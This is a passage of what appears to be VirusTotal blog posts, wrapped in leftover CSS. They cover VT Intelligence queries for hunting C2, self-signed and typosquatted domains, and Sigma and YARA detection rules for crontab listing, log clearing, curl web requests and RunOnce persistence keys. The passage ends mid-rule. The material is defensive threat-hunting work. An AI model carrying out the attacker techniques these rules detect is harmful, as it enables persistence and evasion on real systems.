.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_90 {
width: 90%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>Raimundo Alcázarhttp://www.blogger.com/profile/13300156415377228655noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-69053226982883742902023-12-25T12:30:00.003+01:002023-12-25T12:30:00.139+01:00Hunting for malicious domains with VT Intelligence<div class="interval_12">Please note that this blogpost is part of our #VTMondays series, check out our collection of past publications <a href="https://blog.virustotal.com/2023/12/vtmondays-index.html" target="_blank">here</a>.</div>
<div class="interval_12">Many cyberattacks begin by victims visiting compromised websites that host malware or phishing scams, threat actors use domains for different malicious purposes as part of their infrastructure, and malware communicates with external sites for command and control and exfiltration. Detecting suspicious domains and preemptively feeding corporate security systems can disrupt attacks before they happen, with <a href="https://www.virustotal.com/gui/home/search" target="_blank">VT Intelligence</a> being the perfect platform to early detect them and monitor malicious campaigns’ evolution. </div>
<br />
<div class="interval_12">Let’s start by searching for domains <b>(“entity:domain”)</b> that use self-signed certificates <b>(“tag:self-signed”)</b>. The use of these certificates raise some suspicion as they are unverified. This means anyone can create and issue a certificate for any domain, making it easier for malicious actors to impersonate legitimate websites. We will look for domains created no more than a week ago <b>(“creation_date:7d+”)</b> according to their whois information. Finally, we want samples with more than 5 detections to avoid false positives, however this is completely at your discretion.</div>
<div class="my-yara-code interval_12" style="text-align: center;"><a href="https://www.virustotal.com/gui/search/entity%253Adomain%2520tag%253Aself-signed%2520creation_date%253A7d%252B%2520p%253A5%252B/domains" target="_blank">entity:domain tag:self-signed creation_date:7d+ p:5+</a></div>
<br />
<div class="interval_12">Moving to the next stage, let’s look for C2 domains <b>(“category:command and control”)</b>. Malware periodically contacts C2 servers to receive instructions, that’s why it is worth investigating any connection to them originating from our network. We will use <b>(“lm”)</b> modifier to look for domains updated in VT for the last week and <b>(“detected_communicating_files_count:5+”)</b> modifier to search for domains with at least 20 files in VirusTotal that have been observed trying to contact the domain during sandbox detonation.
</div>
<div class="my-yara-code interval_12" style="text-align: center;"><a href="https://www.virustotal.com/gui/search/entity%253Adomain%2520p%253A5%252B%2520category%253A%2522command%2520and%2520control%2522%2520detected_communicating_files_count%253A5%252B%2520lm%253A7d%252B/domains" target="_blank">entity:domain p:5+ category:"command and control" detected_communicating_files_count:20+ lm:7d+</a></div>
<br />
<div class="interval_12">Finally, we will hunt typosquatted <b>(“fuzzy_domain:fedex.com”)</b> domains to impersonate a given legitimate one, in this example we will use Fedex. In addition, we search for any suspicious domain containing "fedex" as a substring, which is typically used by attackers to confuse victims. The domain modifier <b>(“domain:fedex”)</b> searches for domains containing this word as a substring, and the depth modifier specifies how many subdomains to include in the search <b>(“depth:5-”)</b>. This deep level would find subdomains up to this format “<i>fedex.aaa.bbb.ccc.ddd.com</i>”, where the word fedex could be contained in any of the blocks. We narrow down the results to domains with at least 5 detections <b>(“p:5+”) </b>to reduce noise from false positives.
</div>
<div class="my-yara-code interval_12" style="text-align: center;"><a href="https://www.virustotal.com/gui/search/entity%253Adomain%2520(fuzzy_domain%253Afedex.com%2520or%2520domain%253Afedex%2520and%2520depth%253A5-)%2520p%253A5%252B/domains" target="_blank">entity:domain (fuzzy_domain:fedex.com or domain:fedex and depth:5-) p:5+</a></div>
<br />
<div class="interval_12">You can learn more about domain search modifiers in the <a href="https://docs.virustotal.com/docs/domain-search-modifiers" target="_blank">documentation</a>. </div>
<div class="interval_12"> As always, we would like to <a href="http://virustotal.com/contact" target="_blank">hear from you</a>. </div>
<div class="interval_12"> Happy hunting! </div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
text-align: center;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_90 {
width: 90%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>
Raimundo Alcázarhttp://www.blogger.com/profile/13300156415377228655noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-32564532528143329782023-12-20T13:07:00.002+01:002024-03-05T11:40:41.647+01:00Sigma rules for Linux and MacOS<div class="interval_12"> <b>TLDR</b>: VT Crowdsourced Sigma rules will now also match suspicious activity for macOS and Linux binaries, in addition to Windows.
</div>
<div class="interval_12"> We recently <a href="https://blog.virustotal.com/2023/06/threat-hunting-converting-sigma-to-yara.html" target="_blank">discussed</a> how to maximize the value of Sigma rules by easily converting them to YARA Livehunts. Unfortunately, at that time Sigma rules were only matched against Windows binaries.
</div>
<div class="interval_12"> Since then, our engineering team worked hard to provide a better experience to Sigma lovers, increasing Crowdsourced Sigma rules value by extending matches to macOS and Linux samples.
</div>
<h2 style="text-align: left;">Welcome macOS and Linux</h2>
<div class="interval_12"> Although we are still working to implement Sysmon in our Linux and macOS sandboxes, we implemented new features that allow Sigma rule matching by extracting samples’ runtime behavior.
</div>
<div class="interval_12"> For example, a process created in our sandbox that ends in <mark class="my-yara-code"><mark class="red">“/crontab”</mark></mark> and contains the <mark class="my-yara-code"><mark class="red">"-l"</mark></mark> parameter in the command line would match the following Sigma rule:
</div>
<div class="my-yara-code interval_12">
<p>logsource:
<p> product: linux
<p> category: process_creation
<p>detection:
<p> selection:
<p> Image|endswith: '/crontab'
<p> CommandLine|contains: ' -l'
<p> condition: selection
</div>
<div class="interval_12"> We have mapped all the fields used by Sigma rules with the information offered by our sandboxes, which allowed us to map rules for image_load, process_creation and registry_set, among others.
</div>
<div class="interval_12"> This approach has limitations. However, about 54% of Crowdsourced Sigma rules for Linux and 96% for macOS are related to process creation, meaning we already have enough information to match all these with our sandboxes’ output. The same happens for rules based on file creation.
</div>
<div class="interval_12"> Let’s look at some examples!
</div>
<h2 style="text-align: left;">Linux, MacOS and Windows examples
</h2>
<div class="interval_12"> The following <a href="https://www.virustotal.com/gui/file/fa9586039889b460ca92820d33cb85e410f225e55fe04f021a940735693e5a8a/details" target="_blank">shell script sample</a> matches 11 Crowdsourced Sigma Rule matches.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/bTWJ1UA1ZZD4Rp1zveMMQnBj56Ml4m7CNrtWH5WhtyHoHeZ_jQDszTLVAzzMceuWMx6Ca8KuBfZohKHmbBvL4GXs54q5Ioh3BB8S_fpZBraBPB3hTZnQkjwbC6VDTaAjuKQTsaxIlY47PwEq0ShTu6a8UL3Z-JRQbkf4-cXBMvv1LGHiWc57ouscO9y4SK0PZdj0CqzFqZnbvLlZDlNUoKWYoV7KioE16SOr7w" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> For every rule, it is possible to check what triggered the match by clicking on "View matches”. In the case of Windows binaries, it would show what Sysmon event matched the behavior described in the Sigma rule, as we can see below:
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/nH37fyOS9lB4SH9qzIPAK1yTKLJbS-MCJi7qeWjswE9dhWkogvY5br3uA-J2yPoDF9KYFgupIoA5k5YrG9ZzWwhNIdadZHk-xwJZg_zTUM7DTqeA6nqwMtg2o4sGnL38ZkzhB3Pd8MFf8BI-xN5oTQ0Ol-yMAtkww-xEPK5drozKGfysVmADlLUOuUwer9oGtl0gqz7c-mZXTbez9Rt492v3fTJADgURaO6ydg" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> In the case of the shell script mentioned above, it shows the values that are relevant to the logic of the rule as you can see in the following image:
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/iBVwMpjLAzwLYgV7s-PHZfaTDmuE2ISh-lBEGrLFcFgNIpQ7-f3B2vm4a8R_cEWM5Uax6v3xWT35reZbqurLjx90n-8asI2l1Pxdp41-xEFj0H3Sz99dHzJYtH6kgd54Gw3NvrKWr2UGCI588Ou4QpCZL5VGJnV5q1SddyyPRK6cPezRfFFCB6DVVT7HsB3xrc_FoRkickpOYVcO5F6z-oO6xHemiuSPM5p-eg" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> Interestingly, Sigma rules intended for Linux also produce results in macOS environments, and vice versa. In this case, the shell script can be interpreted by both operating systems. Indeed, one of the matching rules for the sample called <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml" target="_blank">Indicator Removal on Host - Clear Mac System Logs</a> was specifically created for macOS:
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/IU3OM1Nz14k8Pdkaqpi5RWHGc9NjWAHoPKGCL90esa0QZMQb1ZhWqRTDqnVd6vJgCvNpso8PHNQJT2hwmjOrhJRCencqP93ABVfLas7udwAnUCx7gH-svk8LICqcHhZDhodxd5PyVL-oEcAOCx8j40JYMU8d4Iq7Pe-mUh_3IvxIcm20_ChTS7294F-GdclSfNPL19773yuw75SEvOXRruSBYi6NuHMvCtlW3g" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> while a second matching rule, <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml" target="_blank">Commands to Clear or Remove the Syslog </a>, was created for Linux:
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/I83iS3D0wpyQu8TFf0n4dlf153RAfdvIRl8iMWb-sm1NMY8t3P8wwJ3Ixr2rO8gmzAaYHdz7hXuUsRDGzxi_UYuD6OFu3pKsXMXe8KbbDeaAL0tBWfDgcGICAE-irxXsdNRR9kkLDsWsSaXx-5tcdallNMpmYuc-m1GZbAQ4j6-vDPK9wp0Q9ga_Xs7iILRPWqKPzgQv8Q4DoPlLhf274anMMSi3YngwDPbx2w" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> To get more examples of samples with Sigma rules that match sandboxes’ output instead of Sysmon, you can use the following queries:
</div>
<div class="my-yara-code interval_12">(<mark class="red">have</mark>:sigma) and not <mark class="red">have</mark>:evtx <mark class="red">type</mark>:mac</div>
<div class="my-yara-code interval_12">(<mark class="red">have</mark>:sigma) and not <mark class="red">have</mark>:evtx <mark class="red">type</mark>:linux</div>
<div class="interval_12"> A second <a href="https://www.virustotal.com/gui/file/41231183ec32f6cc4313f30cef8b0a29d0df205ea81242ce3f7bfebcf4a58fa3" target="_blank">interesting example</a> is a dmg matching 8 Sigma rules, 5 of them originally created for Linux OS under the “process_creation” category and 2 rules created for macOS. The last match… is a Sigma rule created for Windows samples!
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://s5.gifyu.com/images/Sjbsg.gif" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> The new feature matching Sigma rules with Linux and macOS samples helped us identify some rules that are maybe too generic, which is not necessarily a problem as long as this is the intended behavior.
</div>
<div class="interval_12"> In this case, the <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" target="_blank">Usage Of Web Request Commands And Cmdlets</a> rule was originally created to detect web request using Windows’ command line:
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/M5l7N9cJ_zdbuR-MthKBo19qxAcOfCFc2WsKIX4r7G6BVPRJsnhPrqaNxWtyuXmw2r57sc6lDsTtKi0FehS79GM-dN5E5ZYf9ePC_topnL7foWDDZ80kbnRax1seDc6D1iZeBmhtJMQE3wtFVAAFTUG9xydgYY6pIockMd9fLgn7ZrvbZSf1QcmXyShOdi3Eh-uS5OaACCiRnxXwdXXy8MAAuboqpfdVZJB2fQ" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> The rule seems a bit too generic since it only checks for a few strings in the command line, although it can be highly effective for generic detection of suspicious behavior.
</div>
<div class="interval_12"> To understand why our Macintosh Disk Image sample triggered a detection for this rule, we checked the matches:
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/Gzxk4mCCV0uJ4gyiwoQzIPqsscuWfDyu9CCoNhDuviiC-1zJNh4EyM_EJZq4y27OHUeiUMgf35MmPnMTGZwaYPmPC1VDaY2uzH1QHFb3XqXXTb20RY7Zl3RB_hw-GZqtnUfXP63Soq_RaWI8Wjnplq6z5yT8QWuWSg7B5YVVFbSxJx7GvTuT7uAp4UEzxnGkVYNtSXf_Mo5MKb2Ps-VCCpsDF5nvbL9dcKE3Gw" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> As we can see, the use of the string <mark class="my-yara-code"><mark class="red">“curl”</mark></mark> in the command line was enough to match this sample.
</div>
<div class="interval_12"> This sigma rule had about 9k hits last year only, with more than 300 of the files being Linux or macOS samples. You can obtain the full list using the following query:
</div>
<div class="my-yara-code interval_12"><mark class="red">sigma_rule</mark>:f92451c8957e89bb4e61e68433faeb8d7c1461c3b90d06b3403c8f3d87c728b8 and (<mark class="red">type</mark>:linux or <mark class="red">type</mark>:mac)</div>
<h2 style="text-align: left;">Creating Livehunt rules from Sysmon EVTX outputs
</h2>
<div class="interval_12"> So far we have mainly focused on samples that do not have Sysmon (EVTX) logs. Now let's see how it is possible to create a Livehunt rule based on Sysmon logs. For this, we are going to use the “structure” functionality provided in the Livehunt YARA editor, as we explain in this <a href="https://blog.virustotal.com/2023/09/its-all-about-structure-creating-yara.html" target="_blank">post</a>.
</div>
<div class="interval_12"> The <a href="https://www.virustotal.com/gui/file/75f32ab1a2e666ca53d9d8e3d9d6d7e64ee068aa92af66bdd1e4f6527e83e1ec" target="_blank">sample</a> we will use in this example is associated with CobaltStrike and matches multiple Sigma rules that identify certain behaviors. It is important to note that for every Sigma match, we will see in the file “structure” the context <b>that matched</b> but not the full EVTX logs. These can be downloaded from the sample’s VT report behavior section under “Download Artifacts” or using our API (available for <a href="https://docs.virustotal.com/reference/file-behaviour-evtx" target="_blank">public</a> and <a href="https://docs.virustotal.com/reference/file_behaviourssandbox_idevtx" target="_blank">privately</a> scanned files).
</div>
<div class="interval_12"> The following image shows the matching raw EVTX generated by our sample:
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/04pqw6oXn8r_d-13nYXDumqEUwjtBKraV6WDXV7YV4zD00ZYiUJ5pgwkCrMi00IiIo1aOxmt7mbi3E6xWoJkz-FMlQOHAdA42xCrPoEWLfjFwmOkgz8D5poXj8J5eXXBSYSesDNd7YvxyA0ffV7oA3RbGoiOOSAZ7YY5_ZvXLWBVXvEyErLBcc3XSW0TU4GP7OLnwclWMRERkotJzwSC0iZO-X2SdaGz7yUgFA" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12"> From the sample’s JSON Structure, <b>Sigma_analysis_results</b> is an array that contains objects with all the relevant information related to the matching Sigma rules, including details about the rule itself and EVTX logs. From the previous image, the first highlighted section is related to process creation and the second one is a registry event (value set).
</div>
<div class="interval_12"> As explained in our <a href="https://blog.virustotal.com/2023/09/its-all-about-structure-creating-yara.html" target="_blank">post</a>, by just clicking on the fields that you are interested in you can start building your <a href="https://support.virustotal.com/hc/en-us/articles/360001315437-Livehunt" target="_blank">Livehunt</a> rule, and adjust values accordingly. In this case, our rule will identify files creating registry keys under <mark class="my-yara-code"><mark class="red">\\CurrentVersion\\RunOnce\\</mark></mark> with a <mark class="my-yara-code"><mark class="red">.bat</mark></mark> or <mark class="my-yara-code"><mark class="red">.vbs</mark></mark> extension:
</div>
<div class="my-yara-code interval_12"><p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">import</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"vt"</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">rule</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
sigma_example_registry_keys </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">{</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">meta</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">:</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> target_entity
= </span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"file"</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">condition</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">:</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">for</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">any</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
vt_behaviour_sigma_analysis_results </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">in</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
vt.behaviour.sigma_analysis_results: </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">(</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">for</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">any</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
vt_behaviour_sigma_analysis_results_match_context </span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">in</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
vt_behaviour_sigma_analysis_results.match_context: </span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">(</span>
</p>
<p dir="ltr"
style="background-color: #272e3f; line-height: 1.6285714285714286; margin-bottom: 0pt; margin-top: 0pt;"><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;"> vt_behaviour_sigma_analysis_results_match_context.values</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">[</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"TargetObject"</span><span
style="background-color: transparent; color: gainsboro; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">]</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #007be6; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">icontains</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
style="background-color: transparent; color: #ff667f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">"\\CurrentVersion\\RunOnce\\"</span><span
style="background-color: transparent; color: white; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">
</span><span
